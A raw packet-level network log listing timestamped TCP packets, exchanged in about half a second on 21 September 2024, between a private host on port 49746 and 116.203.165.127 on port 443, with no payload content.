Sep 21, 2024 18:51:38.959245920 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:38.959258080 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:38.959271908 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:38.959302902 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:38.975522041 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:38.975564957 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:38.975598097 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:38.975617886 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:38.975636959 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:38.975652933 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:38.978408098 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:38.978451014 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:38.978461981 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:38.978482962 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:38.978506088 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:38.978530884 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:38.991190910 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:38.991210938 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:38.991262913 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:38.991274118 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:38.991292953 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:38.991317987 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.017067909 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.017111063 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.017148972 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.017158031 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.017187119 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.017205954 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.019541979 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.019582987 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.019612074 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.019619942 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.019656897 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.019658089 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.033922911 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.033965111 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.034027100 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.034035921 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.034188986 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.034188986 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.036904097 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.036943913 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.036987066 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.036994934 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.037010908 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.037038088 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.046016932 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.046060085 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.046096087 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.046104908 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.046120882 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.046143055 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.063545942 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.063600063 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.063765049 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.063776016 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.063822031 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.066183090 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.066225052 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.066262007 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.066270113 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.066313028 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.078191996 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.078233957 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.078269005 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.078277111 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.078293085 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.078313112 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.104002953 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.104022980 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.104087114 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.104101896 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.104146004 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.106507063 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.106525898 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.106585979 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.106595039 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.106636047 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.123065948 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.123107910 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.123259068 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.123279095 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.123326063 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.125395060 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.125452995 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.125474930 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.125483036 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.125509024 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.125523090 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.133258104 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.133320093 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.133347034 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.133356094 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.133378029 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.133397102 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.150866985 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.150912046 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.150947094 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.150957108 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.150969982 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.150995970 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.152792931 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.152847052 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.152868032 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.152877092 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.152892113 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.152920008 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.170480013 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.170525074 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.170586109 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.170593977 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.170625925 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.170640945 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.193893909 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.193919897 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.194025040 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.194046021 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.194099903 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.196475983 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.196501017 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.196551085 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.196558952 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.196578026 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.196603060 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.210068941 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.210091114 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.210155964 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.210165024 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.210207939 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.211693048 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.211710930 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.211893082 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.211906910 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.211951971 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.220289946 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.220345020 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.220383883 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.220391035 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.220418930 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.220437050 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.237951040 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.237993002 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.238154888 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.238163948 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.238229036 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.240221024 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.240262985 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.240298033 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.240304947 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.240326881 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.240346909 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.257749081 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.257788897 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.257838011 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.257846117 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.257880926 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.257900000 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.281176090 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.281224012 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.281259060 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.281267881 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.281294107 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.281308889 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.283159971 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.283199072 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.283235073 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.283241987 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.283256054 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.283273935 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.296813011 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.296855927 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.296905994 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.296915054 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.296941042 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.296961069 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.299573898 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.299613953 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.299644947 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.299653053 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.299679041 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.299696922 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.307442904 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.307483912 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.307542086 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.307550907 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.307576895 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.307596922 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.324640036 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.324681997 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.324723959 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.324740887 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.324764013 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.324788094 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.326468945 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.326510906 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.326541901 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.326549053 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.326574087 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.326591969 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.344980001 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.345021009 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.345068932 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.345077038 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.345101118 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.345118999 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.368069887 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.368119955 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.368201971 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.368211031 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.368263006 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.370268106 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.370307922 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.370352983 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.370361090 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.370382071 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.370404959 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.383841038 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.383861065 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.383922100 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.383930922 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.383975983 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.386169910 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.386221886 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.386257887 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.386265993 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.386290073 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.386307955 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.394613981 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.394655943 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.394705057 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.394712925 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.394747019 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.394758940 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.412003994 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.412056923 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.412123919 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.412132978 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.412162066 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.412182093 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.414486885 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.414526939 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.414560080 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.414567947 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.414597988 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.414607048 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.431915998 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.431958914 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.431987047 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.431997061 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.432025909 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.432035923 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.455029964 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.455054998 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.455125093 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.455136061 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.455178976 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.457494974 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.457515955 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.457571030 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.457580090 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.457621098 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.470837116 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.470858097 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.470920086 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.470931053 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.470971107 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.473439932 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.473462105 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.473529100 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.473536968 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.473578930 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.481389999 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.481410027 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.481472969 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.481482983 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.481524944 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.499269009 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.499289036 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.499349117 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.499358892 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.499411106 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.500828028 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.500845909 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.500891924 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.500900984 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.500940084 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.518999100 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.519038916 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.519072056 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.519079924 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.519109011 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.519124031 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.543107033 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.543154001 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.543184042 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.543195963 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.543237925 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.543257952 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.545461893 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.545555115 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.545598984 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.545607090 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.545634985 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.545654058 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.558104038 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.558163881 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.558176994 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.558187962 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.558216095 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.558229923 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.559998989 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.560039997 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.560075045 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.560082912 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.560117960 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.560131073 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.568005085 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.568048000 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.568078041 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.568087101 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.568110943 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.568123102 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.586173058 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.586224079 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.586242914 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.586251974 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.586277008 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.586297035 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.588320971 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.588362932 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.588392019 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:39.588398933 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:39.588424921 CEST	49746	443	192.168.2.4	116.203.165.127
